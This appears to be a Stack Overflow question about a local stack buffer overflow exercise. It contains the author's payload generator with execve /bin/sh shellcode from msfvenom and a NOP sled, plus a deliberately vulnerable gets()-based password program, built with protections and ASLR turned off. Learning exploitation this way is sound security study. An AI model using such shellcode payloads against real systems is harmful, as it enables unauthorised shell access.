# How to make a simple stack based buffer overflow on gets

Tags: c, security, buffer-overflow, shellcode

I'm trying to do a simple buffer overflow attack by opening a shell through a small buffer. This is the scenario:

Code I'm using to generate the payload with a shellcode generated by msfvenom:

```
#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90

unsigned char shellcode[] =
  "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50"
  "\x54\x5f\x52\x5e\x6a\x3b\x58\x0f\x05";

// esse código tem o propósito de criar um buffer com um código malicioso no final, e com nops no começo
int main(int argc, char** argv)
{
    int nop_padding = 64;
    int code_size = 21;   
    int padding = 21;
    int eip_size = 8;  

    int total_size = padding + eip_size + nop_padding + code_size;
    unsigned char* code = shellcode;
    unsigned char buff[total_size];

    for(int i = 0; i < padding; i++)
        buff[i] = 'A';

    unsigned long long addr = strtoull(argv[1], NULL, 16);

    for(int i = 0; i < eip_size; i++)
    {
        buff[padding + i] = addr & 0xff;
        addr = addr >> 8;
    }

    for(int i = 0; i < nop_padding; i++)
        buff[padding + eip_size + i] = NOP;

    for(int i = 0; i < code_size; i++)
        buff[padding + eip_size + nop_padding + i] = code[i];

    for(int i = 0; i < total_size; i++)
        printf("%c", buff[i]);

    return 0;
}
```

This is the vulnerable code:

```
#include <stdio.h>
#include <string.h>

int main() {
    /* buffer de 9 posições guarda uma string de 8 bytes + o \0 */
    char buff[9];
    int pass = 0;

    printf("\nDigite a senha: ");
    gets(buff);

    if(strcmp(buff, "admin123")) {
        printf ("\n[!] Errou...\n");
    } else {
        printf ("\n[+] Senha correta!\n");
        pass = 1;
    }

    if(pass) {
        printf ("\n*** Parabéns, você entrou no sistema! ***\n");
    }

    return 0;
}
```

The elf for the code is compiled without stack protection and thigs alike and I have disabled ASLR.

Through gdb I managed to get to the following without much trouble:

[image]

Now, I got the message that the shell was spawned, but didn't see it on the debugger, which is already strange and not what I expected.

When moving to outside gdb, I couldn't get it to run. It is of my understanding that due the amount of environment variables that gdb puts, the real offsets change when dealing with the application outside the debugger. To solve that, I tried using ltrace to get the address of the buffer and calculate where I should jump to.

However, every try gave me either invalid instruction or segfault.

Since the buffer is only 9 char, 13 of total space if you consider the int following it, I only have 13 bytes on the stack to write over. That is too litle, so my idea was to put the shellcode after the return of the main, so underneath gets. For some reason, this only works inside gdb and I cant figure out why!

Any help is welcome!

Comment: There is no question in your post. Stack Overflow is not a personal tutorial or general help service. It is for specific questions.

Comment: The question is why the shellcode doesn't work. If you don't have anything to add, just don't comment anything.